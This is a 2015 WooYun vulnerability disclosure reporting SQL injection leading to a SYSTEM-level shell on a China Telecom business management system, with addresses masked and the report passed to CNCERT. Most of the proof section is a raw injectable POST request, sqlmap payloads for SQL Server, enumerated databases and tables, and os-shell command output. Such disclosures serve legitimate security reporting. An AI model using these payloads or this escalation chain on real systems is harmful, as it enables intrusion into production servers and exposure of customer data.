当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142185

漏洞标题:中国电信某业务管理系统存在漏洞导致可getshell

相关厂商:中国电信

漏洞作者: Xmyth_夏洛克

提交时间:2015-09-24 09:42

修复时间:2015-11-12 19:30

公开时间:2015-11-12 19:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-28: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-08: 细节向核心白帽子及相关领域专家公开
2015-10-18: 细节向普通白帽子公开
2015-10-28: 细节向实习白帽子公开
2015-11-12: 细节向公众公开

简要描述:

2333333

详细说明:

电信业务管理系统存在注入
URL:http://**.**.**.**/list.asp
手机号和姓名和状态处均存在注入

存在注入点页面.png


报错

页面报错.png

漏洞证明:

POST /list.asp?act=search HTTP/1.1
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/
Cookie: ASPSESSIONIDACBCARCD=DPLBDPFCMKALKOKNGBKFAPKG
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
button=%e6%90%9c%e7%b4%a2&name=gsuajjpn&tel=*


sqlmap identified the following injection points with a total of 347 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: button=%e6%90%9c%e7%b4%a2&name=gsuajjpn&tel=' AND 3902=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3902=3902) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113))) AND 'PiDy' LIKE 'PiDy
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: button=%e6%90%9c%e7%b4%a2&name=gsuajjpn&tel=';WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: button=%e6%90%9c%e7%b4%a2&name=gsuajjpn&tel=' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: button=%e6%90%9c%e7%b4%a2&name=gsuajjpn&tel=' AND 3902=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3902=3902) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113))) AND 'PiDy' LIKE 'PiDy
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: button=%e6%90%9c%e7%b4%a2&name=gsuajjpn&tel=';WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: button=%e6%90%9c%e7%b4%a2&name=gsuajjpn&tel=' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
available databases [9]:
[*] cardata
[*] fhnf
[*] master
[*] model
[*] msdb
[*] olddc
[*] shangwangka
[*] telsys
[*] tempdb


11个表
Database: telsys
[11 tables]
+--------------+
| area |
| bank |
| ccc |
| ccc2 |
| jiaofei |
| sqlmapoutput |
| taocan |
| taocan2 |
| taocan_type |
| tt |
| userlogin |
+--------------+


dba权限可执行os-shell

Ethernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : **.**.**.**
Subnet Mask . . . . . . . . . . . : **.**.**.**
Default Gateway . . . . . . . . . : **.**.**.**
---
command standard output: 'nt authority\system'
command standard output:
---
Active Connections

Proto Local Address Foreign Address State PID
TCP **.**.**.**:80 **.**.**.**:0 LISTENING 4
TCP **.**.**.**:135 **.**.**.**:0 LISTENING 648
TCP **.**.**.**:1025 **.**.**.**:0 LISTENING 412
TCP **.**.**.**:1433 **.**.**.**:0 LISTENING 1192
TCP **.**.**.**:3306 **.**.**.**:0 LISTENING 1240
TCP **.**.**.**:33046 **.**.**.**:0 LISTENING 2072
TCP **.**.**.**:80 **.**.**.**:64717 ESTABLISHED 4
TCP **.**.**.**:80 **.**.**.**:64724 TIME_WAIT 0
TCP **.**.**.**:80 **.**.**.**:64725 TIME_WAIT 0
TCP **.**.**.**:80 **.**.**.**:64726 TIME_WAIT 0
TCP **.**.**.**:80 **.**.**.**:64731 ESTABLISHED 4
TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4
TCP **.**.**.**:1433 **.**.**.**:10789 FIN_WAIT_1 1192
TCP **.**.**.**:4937 **.**.**.**:80 TIME_WAIT 0
TCP **.**.**.**:4938 **.**.**.**:80 TIME_WAIT 0
TCP **.**.**.**:135 **.**.**.**:1446 ESTABLISHED 648
TCP **.**.**.**:1025 **.**.**.**:1447 ESTABLISHED 412
TCP **.**.**.**:1025 **.**.**.**:1448 ESTABLISHED 412
TCP **.**.**.**:1032 **.**.**.**:0 LISTENING 2272
TCP **.**.**.**:1433 **.**.**.**:4936 ESTABLISHED 1192
TCP **.**.**.**:1434 **.**.**.**:0 LISTENING 1192
TCP **.**.**.**:1446 **.**.**.**:135 ESTABLISHED 1192
TCP **.**.**.**:1447 **.**.**.**:1025 ESTABLISHED 1192
TCP **.**.**.**:1448 **.**.**.**:1025 ESTABLISHED 1192
TCP **.**.**.**:4936 **.**.**.**:1433 ESTABLISHED 1956
UDP **.**.**.**:500 *:* 412
UDP **.**.**.**:4500 *:* 412
UDP **.**.**.**:123 *:* 976
UDP **.**.**.**:137 *:* 4
---


就不深入了

修复方案:

过滤

版权声明:转载请注明来源 Xmyth_夏洛克@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-28 19:28

厂商回复:

CNVD确认所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无